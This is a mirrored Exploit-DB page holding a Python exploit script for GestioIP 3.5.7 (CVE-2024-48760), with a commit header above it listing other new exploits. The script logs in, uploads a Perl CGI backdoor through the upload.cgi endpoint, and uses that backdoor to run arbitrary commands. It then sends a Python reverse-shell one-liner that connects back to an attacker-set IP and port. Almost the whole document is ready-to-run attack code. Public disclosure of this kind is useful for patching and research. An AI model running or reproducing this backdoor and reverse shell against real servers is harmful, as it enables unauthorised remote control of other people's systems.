bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/52204.txt
Exploit-DB 0f3d104e83 DB: 2025-04-15 
15 changes to exploits/shellcodes/ghdb

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
GestioIP 3.5.7 - Remote Command Execution (RCE)
GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)
OpenPanel 0.3.4 - Directory Traversal
OpenPanel 0.3.4 - Incorrect Access Control
OpenPanel 0.3.4 - OS Command Injection
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal

Pimcore 11.4.2 - Stored cross site scripting

Pimcore customer-data-framework 4.2.0 -  SQL injection

SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)

Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
2025-04-15 00:16:26 +00:00

102 lines
No EOL
2.9 KiB
Text
Raw Permalink Blame History

# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760
import requests
import sys
# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"
# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;
print "<html><body>";
print '<!-- CGI backdoor -->';
if (!$req) {
print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
"""
# Exploit functions
def upload_file(session, file_name, file_data):
"""Uploads the file to the server"""
files = {
'file_name': (None, file_name),
'leases_file': (file_name, file_data)
}
response = session.post(target_url, files=files)
if "OK" not in response.text:
print(f"[!] Error uploading {file_name}.")
sys.exit(1)
return response
def run_command(session, cmd):
"""Execute a command in the server through the vuln"""
url = target_url + '?' + cmd
resp = session.get(url)
print(resp.text)
def backdoor_exists(session):
"""Verifies if backdoor is already uploaded or not"""
response = session.get(target_url + "?whoami")
if "www-data" in response.text:
return True # backdoor already uploaded
return False # backdoor not uploaded yet
if __name__ == '__main__':
with requests.Session() as session:
session.auth = (username, password)
# Verify if backdoor is already uploaded
if not backdoor_exists(session):
print("\n[!] Uploading backdoor...\n")
upload_file(session, 'upload.cgi', backdoor_code)
else:
print("\n[+] Backdoor already uploaded. Continue...\n")
# Execute the reverse shell
print("\n[!] Executing reverse shell...\n")
reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
run_command(session, reverse_shell_cmd)
Reference in a new issue View git blame Copy permalink